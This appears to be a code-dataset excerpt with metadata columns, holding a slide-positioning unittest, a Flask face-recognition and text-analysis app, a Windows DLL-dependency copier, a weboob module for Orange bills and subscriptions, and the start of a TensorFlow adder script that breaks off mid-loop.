"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_relative_positioning(self):
# Relative positioning is probably the most useful positioning.
# It allows you to insert or remove a slide, and everything adjusts.
positions = [
# The first two slides are just default positons
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Then suddenly we move vertically!
{"data-x": "r0", "data-y": "r1000"},
# Continue the same way one slide.
{"data-x": "r0", "data-y": "r1000"},
# Stand still
{"data-x": "r0", "data-y": "r0"},
# Stand still again!
{"data-x": "r0", "data-y": "r0"},
# Move a little bit
{"data-x": "r-40", "data-y": "r-200"},
# Go back to normal movement to the right
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Absolute movement back to start!
{"data-x": "0", "data-y": "0"},
# Absolute movement to a center for end (with zoomout for example)
{"data-x": "3000", "data-y": "1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1560,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3160,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4760,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 6360,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_absolute_path(self):
# Position slides along a path
positions = [
{
"data-x": "r0",
"data-y": "r0",
"path": "M 100 100 L 300 100 L 300 300",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"is_path": True},
{"is_path": True},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 4000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_relative_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r0", "data-y": "r2400"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
# This point is exactly on a 90 degree angle. Therefore,
# it's angle is calculated as 45 degrees, it being the
# average.
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 4800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_complex_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
# Note that we don't change the rotation, so it stays at 90, here.
{"data-x": "0", "data-y": "0"},
# No new x and y, previous was absolute: Stay still!
{},
{
"data-x": "r0",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"data-x": "3000", "data-y": "1000", "data-rotate-z": "0"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# Note that we don't change the rotation, so it stays at 90, here.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# No settings, still same place and rotation.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# We start a path, but x and y are r0, so no movement.
# However, the rotation will come from the path, so it resets to 0.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
class PositionTest(unittest.TestCase):
def test_complete(self):
tree = make_tree("positioning.rst")
# Position the slides:
position_slides(tree)
# Get all slide position data:
positions = []
for step in tree.findall("step"):
pos = {}
for key in step.attrib:
if key.startswith("data-"):
pos[key] = step.attrib[key]
positions.append(pos)
self.assertEqual(
positions,
[
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "1600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
# Because of the path, we now get an explicit rotation:
{
"data-x": "3200",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "2400",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Rotation carries over from last part of path.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# No position change
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# No change at all.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# Path starts, rotation comes from path:
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "2400",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
# Explicit rotate-x and z, automatic position including rotate-z from path.
{
"data-x": "2400",
"data-y": "2400",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Explicit x and y, all other carry over from last slide.
{
"data-x": "3000",
"data-y": "1000",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning relative to other slide by id
{
"data-x": "4000",
"data-y": "500",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning x relative to other slide by id, Explicit y
{
"data-x": "4800",
"data-y": "200",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
],
)
if __name__ == "__main__":
unittest.main()
| mit | -3,711,826,740,963,475,500 | 32.642544 | 91 | 0.287595 | false | 4.167051 | true | false | false |
Cydrobolt/spegill | spegill/__init__.py | 1 | 4011 | from . import config
from flask import Flask, request, render_template
import indicoio, requests
import ujson as json
from RedisLib import rds, R_SPEGILL_USER
import base64, hashlib
indicoio.config.api_key = config.indico_api_key
app = Flask('spegill')
app.secret_key = config.password
current_talking_user = ""
def append_to_redis_array(redis_key, new_entry):
# new_entry is an array that is to be combined with
# the existing array in `redis_key`
curr_redis_data = rds.get(redis_key)
if curr_redis_data == None:
curr_redis_data = "[]"
current_data = json.loads(curr_redis_data)
current_data += new_entry
new_redis_data = json.dumps(current_data)
rds.set(redis_key, new_redis_data)
def get_external_link(file_hash):
return "{}/{}.jpg".format(config.external_host, file_hash)
def retrain_dataset():
retrain_url = "https://apius.faceplusplus.com/v2/train/identify?api_secret={}&api_key={}&group_name=main".format(
config.facepp_api_secret, config.facepp_api_key
)
return requests.get(retrain_url).text
current_user = None
@app.route("/text_data", methods=["GET", "POST"])
def analyse_text():
input_text = request.form["text"]
user_key = current_talking_user
action = request.form.get("action")
if action == "political":
indico_response = indicoio.analyze_text(input_text, apis=['political'])
political_party = indico_response["political"]
top_political_party = sorted(political_party.keys(), key=lambda x: political_party[x], reverse=True)[0]
return top_political_party
else:
indico_response = indicoio.analyze_text(input_text, apis=['keywords'])
keywords = indico_response["keywords"]
keywords_ = (sorted(keywords.keys(), key=lambda x: keywords[x], reverse=True)[:5])
return keywords_
@app.route("/image_create_person", methods=["GET", "POST"])
def create_person():
face_id_list = request.form.get("face_id_list")
obj_id_list = json.loads(face_id_list)
obj_csv_id_list = ",".join(obj_id_list)
post_url = config.facepp_compiled_person_path.format(obj_csv_id_list)
icp = requests.post(post_url)
return icp.text
@app.route("/update_user_data", methods=["GET", "POST"])
def update_user_data():
person_id = request.form.get("person_id")
user_dump = request.form.get("user_dump")
spegill_user_redis_key = R_SPEGILL_USER % person_id
rds.set(spegill_user_redis_key + ":dump", user_dump)
retrain_dataset()
return "OK"
@app.route("/image_recog_person", methods=["GET", "POST"])
def recog_person():
person_image_url = request.form.get("data_hash")
post_url = config.facepp_compiled_person_get_path.format(person_image_url)
irp = requests.post(post_url)
irpp = json.loads(irp.text)
try:
recog_first_match = irpp["face"][0]["candidate"][0]
recog_person_id = recog_first_match["person_id"]
recog_person_confidence = recog_first_match["confidence"]
if recog_person_confidence < 65:
return "NO MATCH"
spegill_user_redis_key = R_SPEGILL_USER % recog_person_id
result = rds.get(spegill_user_redis_key + ":dump")
return result
except:
return "ERR"
@app.route("/image_data", methods=["GET", "POST"])
def analyse_image():
image_b64 = request.form["b64_image"][22:]
img_data = base64.b64decode(image_b64)
h = hashlib.sha256()
h.update(image_b64)
file_hash = h.hexdigest()
filename = 'spegill/static/{}.jpg'.format(file_hash)
with open(filename, 'wb') as f:
f.write(img_data)
spegill_external_path = get_external_link(file_hash)
facepp_request_path = config.facepp_compiled_path.format(spegill_external_path)
r = requests.get(facepp_request_path)
return json.dumps({"o": r.text, "ha": spegill_external_path})
@app.route("/add")
def add_ads():
return render_template("add.html")
@app.route("/")
def root():
return render_template("video.html")
| gpl-2.0 | 6,634,910,512,847,834,000 | 30.093023 | 117 | 0.659686 | false | 3.094907 | true | false | false |
Bitcoinsulting/dark-test-v2 | libjl777/mxe/tools/copydlldeps.py | 3 | 7082 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# DLL dependency resolution and copying script.
# Copyright (C) 2010 John Stumpo
# Copyright (C) 2014 Martin Müllenhaupt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import shutil
import struct
import sys
def is_pe_file(file):
if not os.path.isfile(file): # Skip directories
return False
f = open(file, 'rb')
if f.read(2) != b'MZ':
return False # DOS magic number not present
f.seek(60)
peoffset = struct.unpack('<L', f.read(4))[0]
f.seek(peoffset)
if f.read(4) != b'PE\0\0':
return False # PE magic number not present
return True
def get_imports(file):
f = open(file, 'rb')
# We already know it's a PE, so don't bother checking again.
f.seek(60)
pe_header_offset = struct.unpack('<L', f.read(4))[0]
# Get sizes of tables we need.
f.seek(pe_header_offset + 6)
number_of_sections = struct.unpack('<H', f.read(2))[0]
f.seek(pe_header_offset + 116)
number_of_data_directory_entries = struct.unpack('<L', f.read(4))[0]
data_directory_offset = f.tell() # it's right after the number of entries
# Where is the import table?
f.seek(data_directory_offset + 8)
rva_of_import_table = struct.unpack('<L', f.read(4))[0]
# Get the section ranges so we can convert RVAs to file offsets.
f.seek(data_directory_offset + 8 * number_of_data_directory_entries)
sections = []
for i in range(number_of_sections):
section_descriptor_data = f.read(40)
name, size, va, rawsize, offset = \
struct.unpack('<8sLLLL', section_descriptor_data[:24])
sections.append({'min': va, 'max': va+rawsize, 'offset': offset})
def seek_to_rva(rva):
for s in sections:
if s['min'] <= rva and rva < s['max']:
f.seek(rva - s['min'] + s['offset'])
return
raise ValueError('Could not find section for RVA.')
# Walk the import table and get RVAs to the null-terminated names of DLLs
# this file uses. The table is terminated by an all-zero entry.
seek_to_rva(rva_of_import_table)
dll_rvas = []
while True:
import_descriptor = f.read(20)
if import_descriptor == b'\0' * 20:
break
dll_rvas.append(struct.unpack('<L', import_descriptor[12:16])[0])
# Read the DLL names from the RVAs we found in the import table.
dll_names = []
for rva in dll_rvas:
seek_to_rva(rva)
name = b''
while True:
c = f.read(1)
if c == b'\0':
break
name += c
dll_names.append(name.decode("ascii"))
return dll_names
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Recursive copy of DLL dependencies')
parser.add_argument('targetdir',
type=str,
help='target directory where to place the DLLs')
parser.add_argument('-C',
'--checkdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='directories whose dependencies must be ' +
'fulfilled. All PE files will be checked ' +
'(mostly .exe and .dll files)',
dest='checkdirs')
parser.add_argument('-L',
'--libdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='include directories to search for DLL ' +
'dependencies (only .dll files will be used ' +
'from here)',
dest='libdirs')
args = parser.parse_args()
if sys.version_info < (3, 0):
from sets import Set as set
# Map from shortname ('qtcore4.dll') to full path (eg.
# '/.../mxe/i686-w64-mingw32.shared/qt/bin/QtCore4.dll')
available_dlls = dict()
# Remember already copied DLLs (eg 'qtcore4.dll', 'qtgui4.dll')
copied_dlls = set()
# Remember which DLLs must still be checked (eg 'qtnetwork4.dll',
# 'qtgui4.dll')
dlls_to_copy = set()
not_found_dlls = set()
# Create a list of all available .dll files in the libdir directories
# Flattening list: http://stackoverflow.com/questions/952914
for libdir in [item for sublist in args.libdirs for item in sublist]:
for dll_filename in os.listdir(libdir):
dll_filename_full = os.path.join(libdir, dll_filename)
if dll_filename.endswith('.dll') and is_pe_file(dll_filename_full):
available_dlls[dll_filename.lower()] = dll_filename_full
# Create a list of initial dependencies (dlls_to_copy) and already copied
# DLLs (copied_dlls) from the checkdir arguments.
# Flattening list: http://stackoverflow.com/questions/952914
for checkdir in [item for sublist in args.checkdirs for item in sublist]:
for pe_filename in os.listdir(checkdir):
pe_filename_full = os.path.join(checkdir, pe_filename)
if is_pe_file(pe_filename_full):
for dependency_dll in get_imports(pe_filename_full):
dlls_to_copy.add(dependency_dll.lower())
if pe_filename.endswith('.dll'):
copied_dlls.add(pe_filename.lower())
while len(dlls_to_copy):
# We may not change the set during iteration
for dll_to_copy in dlls_to_copy.copy():
if dll_to_copy in copied_dlls:
None
elif dll_to_copy in not_found_dlls:
None
elif dll_to_copy in available_dlls:
shutil.copyfile(available_dlls[dll_to_copy],
os.path.join(args.targetdir,
os.path.basename(available_dlls[dll_to_copy])))
copied_dlls.add(dll_to_copy.lower())
for dependency_dll in get_imports(available_dlls[dll_to_copy]):
dlls_to_copy.add(dependency_dll.lower())
else:
not_found_dlls.add(dll_to_copy)
dlls_to_copy.remove(dll_to_copy)
print("Missing dll files: " + ", ".join(not_found_dlls))
| mit | -8,668,788,728,360,593,000 | 39.00565 | 79 | 0.573365 | false | 3.792716 | false | false | false |
laurentb/weboob | modules/orange/pages/bills.py | 1 | 9949 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Vincent Paredes
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
try:
from html.parser import HTMLParser
except ImportError:
import HTMLParser
from weboob.browser.pages import HTMLPage, LoggedPage, JsonPage
from weboob.capabilities.bill import Subscription
from weboob.browser.elements import DictElement, ListElement, ItemElement, method, TableElement
from weboob.browser.filters.standard import (
CleanDecimal, CleanText, Env, Field,
Regexp, Date, Currency, BrowserURL,
Format, Eval, Lower,
)
from weboob.browser.filters.html import Link, TableCell
from weboob.browser.filters.javascript import JSValue
from weboob.browser.filters.json import Dict
from weboob.capabilities.base import NotAvailable
from weboob.capabilities.bill import DocumentTypes, Bill
from weboob.tools.date import parse_french_date
from weboob.tools.compat import urlencode
class BillsApiProPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'bills'
# orange's API will sometimes return the temporary bill for the current month along with other bills
# in the json. The url will lead to the exact same document, this is probably not intended behaviour and
# causes weboob to raise a DataError as they'll have identical ids.
ignore_duplicate = True
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('dueDate'), parse_func=parse_french_date, default=NotAvailable)
obj_price = CleanDecimal(Dict('amountIncludingTax'))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
def get_params(self):
params = {'billid': Dict('id')(self), 'billDate': Dict('dueDate')(self)}
return urlencode(params)
obj_url = BrowserURL('doc_api_pro', subid=Env('subid'), dir=Dict('documents/0/mainDir'), fact_type=Dict('documents/0/subDir'), billparams=get_params)
obj__is_v2 = False
class BillsApiParPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'billsHistory/billList'
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('date'), default=NotAvailable)
obj_price = Eval(lambda x: x / 100, CleanDecimal(Dict('amount')))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
obj_url = Format('%s%s', BrowserURL('doc_api_par'), Dict('hrefPdf'))
obj__is_v2 = True
# is BillsPage deprecated ?
class BillsPage(LoggedPage, HTMLPage):
@method
class get_bills(TableElement):
item_xpath = '//table[has-class("table-hover")]/div/div/tr | //table[has-class("table-hover")]/div/tr'
head_xpath = '//table[has-class("table-hover")]/thead/tr/th'
col_date = 'Date'
col_amount = ['Montant TTC', 'Montant']
col_ht = 'Montant HT'
col_url = 'Télécharger'
col_infos = 'Infos paiement'
class item(ItemElement):
klass = Bill
obj_type = DocumentTypes.BILL
obj_format = "pdf"
# TableCell('date') can have other info like: 'duplicata'
obj_date = Date(CleanText('./td[@headers="ec-dateCol"]/text()[not(preceding-sibling::br)]'), parse_func=parse_french_date, dayfirst=True)
def obj__cell(self):
# sometimes the link to the bill is not in the right column (Thanks Orange!!)
if CleanText(TableCell('url')(self))(self):
return 'url'
return 'infos'
def obj_price(self):
if CleanText(TableCell('amount')(self))(self):
return CleanDecimal(Regexp(CleanText(TableCell('amount')), '.*?([\d,]+).*', default=NotAvailable), replace_dots=True, default=NotAvailable)(self)
else:
return Field('_ht')(self)
def obj_currency(self):
if CleanText(TableCell('amount')(self))(self):
return Currency(TableCell('amount')(self))(self)
else:
return Currency(TableCell('ht')(self))(self)
# Only when a list of documents is present
obj__url_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*?contentList[\d]+ \+= \'<li><a href=".*\"(.*?idDocument=2)"', default=None)
def obj_url(self):
if Field('_url_base')(self):
# URL won't work if HTML is not unescape
return HTMLParser().unescape(str(Field('_url_base')(self)))
return Link(TableCell(Field('_cell')(self))(self)[0].xpath('./a'), default=NotAvailable)(self)
obj__label_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*</span>(.*?)</a.*', default=None)
def obj_label(self):
if Field('_label_base')(self):
return HTMLParser().unescape(str(Field('_label_base')(self)))
else:
return CleanText(TableCell(Field('_cell')(self))(self)[0].xpath('.//span[@class="ec_visually_hidden"]'))(self)
obj__ht = CleanDecimal(TableCell('ht', default=NotAvailable), replace_dots=True, default=NotAvailable)
def obj_vat(self):
if Field('_ht')(self) is NotAvailable or Field('price')(self) is NotAvailable:
return
return Field('price')(self) - Field('_ht')(self)
def obj_id(self):
if Field('price')(self) is NotAvailable:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('_ht')(self))
else:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('price')(self))
class SubscriptionsPage(LoggedPage, HTMLPage):
def build_doc(self, data):
data = data.decode(self.encoding)
for line in data.split('\n'):
mtc = re.match('necFe.bandeau.container.innerHTML\s*=\s*stripslashes\((.*)\);$', line)
if mtc:
html = JSValue().filter(mtc.group(1)).encode(self.encoding)
return super(SubscriptionsPage, self).build_doc(html)
@method
class iter_subscription(ListElement):
item_xpath = '//ul[@id="contractContainer"]//a[starts-with(@id,"carrousel-")]'
class item(ItemElement):
klass = Subscription
obj_id = Regexp(Link('.'), r'\bidContrat=(\d+)', default='')
obj__page = Regexp(Link('.'), r'\bpage=([^&]+)', default='')
obj_label = CleanText('.')
obj__is_pro = False
def validate(self, obj):
# unsubscripted contracts may still be there, skip them else
# facture-historique could yield wrong bills
return bool(obj.id) and obj._page != 'nec-tdb-ouvert'
class SubscriptionsApiPage(LoggedPage, JsonPage):
@method
class iter_subscription(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
def condition(self):
return Dict('contractStatus')(self) != 'CLOS'
obj_id = Dict('contractId')
obj_label = Dict('offerName')
obj__is_pro = False
class ContractsPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = Dict('id')
obj_label = Format('%s %s', Dict('name'), Dict('mainLine'))
obj__from_api = False
def condition(self):
return Dict('status')(self) == 'OK'
def obj__is_pro(self):
return Dict('offerNature')(self) == 'PROFESSIONAL'
class ContractsApiPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = CleanText(Dict('cid'))
obj_label = Dict('offerName')
def obj_subscriber(self):
names = (
CleanText(Dict('holder/firstName', default=""))(self),
CleanText(Dict('holder/lastName', default=""))(self),
)
assert any(names), "At least one name field should be populated. Has the page changed?"
return ' '.join([n for n in names if n])
def obj__is_pro(self):
return Dict('telco/marketType', default='PAR')(self) == 'PRO'
obj__from_api = True
def condition(self):
return Lower(Dict('status'))(self) == 'actif'
| lgpl-3.0 | 2,442,179,936,831,297,500 | 38.007843 | 170 | 0.587614 | false | 3.959793 | false | false | false |
derrowap/MA490-MachineLearning-FinalProject | adderNN.py | 1 | 2934 | # start a session which transfers data to a C++ envirnment where it is optimized for perfomance
import tensorflow as tf
import random as rn
import trainingFunctions as funcs
sess = tf.InteractiveSession()
# two functions to initialize weight and bias
# weight is initiated with slight noise for symmetry breaking
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
# bias is initialized with slight positive to avoid dead neurons
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# placeholders that we'll ask tensorflow to fill later
# shape lets us know that it is a 2d tensor that has a first dimension of any size, and a second dimension of size 784 (for x)
x = tf.placeholder(tf.float32, shape=[None, 1])
y_ = tf.placeholder(tf.float32, shape=[None, 1])
# Variable is a value that lives in TensorFlow's computation graph
W = tf.Variable(tf.zeros([1,1])) # W is 1x1 matrix because 1 input and 1 output
b = tf.Variable(tf.zeros([1])) # b is 1-dimensional vector (we have 10 classes)
# initialize variables in session
sess.run(tf.initialize_all_variables())
# multiply input image by weight matrix and add the bias
y = tf.nn.sigmoid(tf.matmul(x,W) + b)
# cost function (we try to minimize) is cross-entropy between the target and model's prediction
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y)))
# add new operation to computation gaph
# train_step will apply gradient descent updates to parameters
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# repeatedly calling train_step will train the model
for i in range(100):
init = 100
valArr = [0] * init
ansArr = [0] * init
for k in range(init):
